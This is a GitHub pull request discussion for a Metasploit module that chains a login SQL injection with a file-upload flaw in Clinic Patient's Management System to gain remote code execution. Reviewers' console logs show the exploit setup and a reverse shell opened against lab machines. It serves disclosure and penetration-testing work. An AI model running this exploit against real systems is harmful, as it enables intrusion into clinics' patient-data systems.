-
Notifications
You must be signed in to change notification settings - Fork 14.4k
Clinic Patient's Management System SQLi (CVE-2025-3096) #20177
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Clinic Patient's Management System SQLi (CVE-2025-3096) #20177
Conversation
Is this software used/deployed in the real world™? |
I don't think so, there's no results on Shodan. But there seems to be some "user" activity at source site. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Great module @msutovsky-r7! A couple minor comments.
Testing
msf6 exploit(multi/http/clinic_pms_sqli_to_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Logged using SQL injection..
[*] Malicious file uploaded..
[*] Logged out..
[*] Logged using SQL injection..
[*] Reporting vulnerability
[*] Sending stage (40004 bytes) to 172.16.199.134
[*] Meterpreter session 3 opened (172.16.199.1:4444 -> 172.16.199.134:36072) at
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : msfuser-virtual-machine
OS : Linux msfuser-virtual-machine 6.8.0-59-generic #61~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 15 17:03:15 UTC 2 x86_64
Meterpreter : php/linux
meterpreter >
documentation/modules/exploit/multi/http/clinic_pms_sqli_to_rce.md
Outdated
Show resolved
Hide resolved
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for making all those changes @msutovsky-r7! Working as expected 👍
msf6 exploit(multi/http/clinic_pms_sqli_to_rce) > set targeturi /clinic-pms/pms/
targeturi => /clinic-pms/pms/
msf6 exploit(multi/http/clinic_pms_sqli_to_rce) > set rhost 172.16.199.134
rhost => 172.16.199.134
msf6 exploit(multi/http/clinic_pms_sqli_to_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/clinic_pms_sqli_to_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if target is vulnerable...
[+] The target appears to be vulnerable. Clinic PMS detected
[*] Logged using SQL injection..
[*] Malicious file uploaded..
[*] Logged out..
[*] Logged using SQL injection..
[*] Reporting vulnerability
[*] Sending stage (40004 bytes) to 172.16.199.134
[+] Deleted 1747841934yfqXXZYq.php
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.134:35942) at 2025-05-21 08:38:55 -0700
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : msfuser-virtual-machine
OS : Linux msfuser-virtual-machine 6.8.0-59-generic #61~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 15 17:03:15 UTC 2 x86_64
Meterpreter : php/linux
meterpreter >
Release NotesClinic Patient's Management System contains SQL injection vulnerability in login section. This module uses the vulnerability (CVE-2025-3096) to gain unauthorized access to the application. As lateral movement, it uses another vulnerability (CVE-2022-2297) to gain remote code execution. |
Vulnerable Application
Clinic Patient's Management System contains SQL injection vulnerability in login section. This module uses the vulnerability (CVE-2025-3096) to gain unauthorized access to the application. As lateral movement, it uses another vulnerability (CVE-2022-2297) to gain remote code execution.
Verification Steps
Vulnerable Application Installation Setup
Install Clinic's Patient Management System on your web server.
Start
msfconsole
and load the exploit module:If the target is vulnerable, you will see a message indicating that the target is susceptible to the exploit:
Options
TARGETURI
: (Required) The base path to the Clinic Patient Management System (default:/pms
).Scenarios